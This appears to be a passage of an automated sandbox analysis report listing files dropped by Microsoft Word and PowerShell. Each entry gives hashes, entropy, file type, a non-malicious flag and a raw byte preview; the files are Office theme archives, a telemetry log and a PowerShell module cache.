                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1740
                                                  Entropy (8bit):5.469280231278569
                                                  Encrypted:false
                                                  SSDEEP:48:rWSU4xympjmZ9tz4RIoUeNWR831NFxQ9001dqfJ:rLHxvMZfIfjW8kS01Yh
                                                  MD5:B819321E7AD691C1F31E2E412F55ABD0
                                                  SHA1:9FA788AEE866F7981727ACDDCAE67B51CE384AC4
                                                  SHA-256:788ECFB6655EA99B3A574ED35F8EC41F3564B13994509FF70E62C522AA7F2336
                                                  SHA-512:6D3820846E0CA5ED96293E8BB65AEA2239724BBCF4EA4A6231F1BF2E2867C2B5D735A5869BB8F28552F74FDFFFD655139C259F8E81310D8B8515B272C19C9DCD
                                                  Malicious:false
                                                  Preview:@...e...........K.....................X..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.D....................+.H..!...e........System.Configuration.Ins
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:ASCII text, with very long lines (4562), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26143
                                                  Entropy (8bit):5.538098875989052
                                                  Encrypted:false
                                                  SSDEEP:768:JaqtTdfjo3NzfDHHp2UAdS7CpiOuUO4dbzyRCeQabMOWkaJDVBfRQwsBW:QUTdfjo3NzfDHHpXAdS7OiWO4dbOweQj
                                                  MD5:8F8251FAC1677D261EB84763D4D422E0
                                                  SHA1:D9124F9E28C94AF29B5FE380195E361B6C2971CF
                                                  SHA-256:6E455AB4F8EFEA26BA8FBB04DDC01A13AE7B296949E079E80B61DF5657CF7588
                                                  SHA-512:6D8A8B8E85357DA98C917DB832F7B42FF6F7250788141B7E492EADB9DC7437924468CFCF9D9D4C49B6CF893BED59ADBD8642D8D94D12612BBA2603C9DF98B934
                                                  Malicious:false
                                                  Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/20/2024 23:13:04.671.WINWORD (0x654).0xC3C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-12-20T23:13:04.671Z","Contract":"Office.System.Activity","Activity.CV":"zZ6vhtHR10qZTuLUGXXkzA.7.1","Activity.Duration":248,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...12/20/2024 23:13:04.671.WINWORD (0x654).0xC3C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":24,"Time":"2024-12-20T23:13:04.671Z","Contract":"Office.System.Activity","Activity.CV":"zZ6vhtHR10qZTuLUGXXkzA.7","Activity.Duration":2901,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDiagn
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):1463634
                                                  Entropy (8bit):7.898382456989258
                                                  Encrypted:false
                                                  SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                  MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                  SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                  SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                  SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                  Malicious:false
                                                  Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):280
                                                  Entropy (8bit):3.5286004619027067
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                  MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                  SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                  SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                  SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):1204049
                                                  Entropy (8bit):7.92476783994848
                                                  Encrypted:false
                                                  SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                  MD5:FD5BBC58056522847B3B75750603DF0C
                                                  SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                  SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                  SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                  Malicious:false
                                                  Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):276
                                                  Entropy (8bit):3.5364757859412563
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                  MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                  SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                  SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                  SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):1091485
                                                  Entropy (8bit):7.906659368807194
                                                  Encrypted:false
                                                  SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                  MD5:2192871A20313BEC581B277E405C6322
                                                  SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                  SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                  SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                  Malicious:false
                                                  Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):280
                                                  Entropy (8bit):3.5301133500353727
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                  MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                  SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                  SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                  SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):1750795
                                                  Entropy (8bit):7.892395931401988
                                                  Encrypted:false
                                                  SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                  MD5:529795E0B55926752462CBF32C14E738
                                                  SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                  SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                  SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                  Malicious:false
                                                  Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):280
                                                  Entropy (8bit):3.528155916440219
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                  MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                  SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                  SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                  SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):2357051
                                                  Entropy (8bit):7.929430745829162
                                                  Encrypted:false
                                                  SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                  MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                  SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                  SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                  SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                  Malicious:false
                                                  Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):276
                                                  Entropy (8bit):3.516423078177173
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                  MD5:5402138088A9CF0993C08A0CA81287B8
                                                  SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                  SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                  SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):2218943
                                                  Entropy (8bit):7.942378408801199
                                                  Encrypted:false
                                                  SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                  MD5:EE33FDA08FBF10EF6450B875717F8887
                                                  SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                  SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                  SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                  Malicious:false
                                                  Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):278
                                                  Entropy (8bit):3.544065206514744
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                  MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                  SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                  SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                  SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):3078052
                                                  Entropy (8bit):7.954129852655753
                                                  Encrypted:false
                                                  SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                  MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                  SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                  SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                  SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                  Malicious:false
                                                  Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):274
                                                  Entropy (8bit):3.5303110391598502
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                  MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                  SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                  SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                  SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):2924237
                                                  Entropy (8bit):7.970803022812704
                                                  Encrypted:false
                                                  SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                  MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                  SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                  SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                  SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                  Malicious:false
